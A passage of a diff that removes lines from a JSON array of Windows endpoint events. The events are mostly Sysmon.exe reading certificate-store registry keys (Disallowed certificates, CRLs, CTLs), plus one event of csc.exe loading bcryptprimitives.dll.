"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 